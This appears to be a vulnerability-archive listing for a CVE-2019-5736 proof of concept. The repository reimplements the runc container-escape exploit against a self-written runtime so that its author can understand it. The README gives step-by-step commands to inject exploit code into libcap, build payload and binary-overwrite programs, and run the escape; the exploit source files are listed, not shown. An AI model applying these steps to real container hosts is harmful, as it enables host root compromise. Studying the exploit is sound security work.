Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-5736 PoC — Docker 操作系统命令注入漏洞

Source
https://github.com/GiverOfGifts/CVE-2019-5736-Custom-Runtime
Associated Vulnerability
Title:Docker 操作系统命令注入漏洞 (CVE-2019-5736)
Description:runc through 1.0-rc6, as used in Docker before 18.09.2 and other products, allows attackers to overwrite the host runc binary (and consequently obtain host root access) by leveraging the ability to execute a command as root within one of these types of containers: (1) a new container with an attacker-controlled image, or (2) an existing container, to which the attacker previously had write access, that can be attached with docker exec. This occurs because of file-descriptor mishandling, related to /proc/self/exe.
Description
CVE-2019-5736 implemented in a self-written container runtime to understand the exploit.
Readme
# CVE-2019-5736-Custom-Sandbox

## General

CVE-2019-5736 implemented using a shallow, self-written container runtime to understand the exploit.

Exploit is based on (and almost all copied from) the runc-poc by twistlock: https://github.com/twistlock/RunC-CVE-2019-5736/tree/master/malicious_image_POC

## Container Runtime (quarantine)

See code docs for further details.

```sh
Usage: quarantine [OPTIONS] [BINARY and its ARGS]

--rootfs: (mandatory) Specify a rootfs for the container.
--urange: Specify a urange start_host:end_host,start_guest.
--grange: Specify a grange start_host:end_host,start_guest.
--uid:    Specify the desired UID in the container.
--ugd:    Specify the desired GID in the container.
--supp:   Append supplementary groups from the specified grange to the process running in the container.
```

Unshares all namespaces except for the user ns. User ns is unshared under special circumstances, i.e. when `urange`, `grange`, `uid` and / or `gid` are specified. 

## Setup for the exploit

This was tested and done on Ubuntu 18.04.

1. Get a rootfs (bionic for example)
    - `mkdir rootfs`
    - `sudo debootstrap bionic ./rootfs`
2. Get libcap source
    - `git clone https://github.com/mhiramat/libcap`
3. Modifiy libcap
    - `cat exploit_code_for_shared_lib.c >> <any cap*.c, I used cap_alloc.c>`
    - `make`
4. chroot into the rootfs and install libcap-dev so you can simply link to the modified `libcap.so`
    - `sudo chroot rootfs`
    - `apt install libcap-dev`
5. Copy the created `libcap.so.2.25` file into the appropriate rootfs dir
    -`sudo cp libcap.so.2.25 rootfs/lib/x86_64-linux-gnu`
    - *Note*: For me, there already was a link pointing at that exact libcap file version, so I haven't had to link it
    - *Note*: This path might change, always look at where the compiled quarantine expects the libcap to be: `ldd quarantine`
6. Compile and copy the other files into the rootfs
    - `sudo cp shebang_exploit rootfs/`
    - `sudo gcc -o rootfs/root/payload payload.c`
    - `sudo gcc -o rootfs/overwrite_sndbx_runtime overwrite_sndbx_runtime.c`

## Run exploit

For example: `sudo ./quarantine --rootfs rootfs /shebang_exploit` or `./quarantine --rootfs rootfs --uid 1 /shebang_exploit`. 

It works as long as you either keep `CAP_DAC_OVERRIDE` or `CAP_SYS_ADMIN` on the host, i.e. don't unshare user ns when using sudo (since this drops caps in parent ns), or you own the file on the host.
File Snapshot

 [4.0K]  /data/pocs/434a1a14ecb069740169188733444e275130e556
├── [ 924]  exploit_code_for_shared_lib.c
├── [2.9K]  overwrite_sndbx_runtime.c
├── [ 17K]  quarantine.cpp
└── [2.4K]  README.md

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →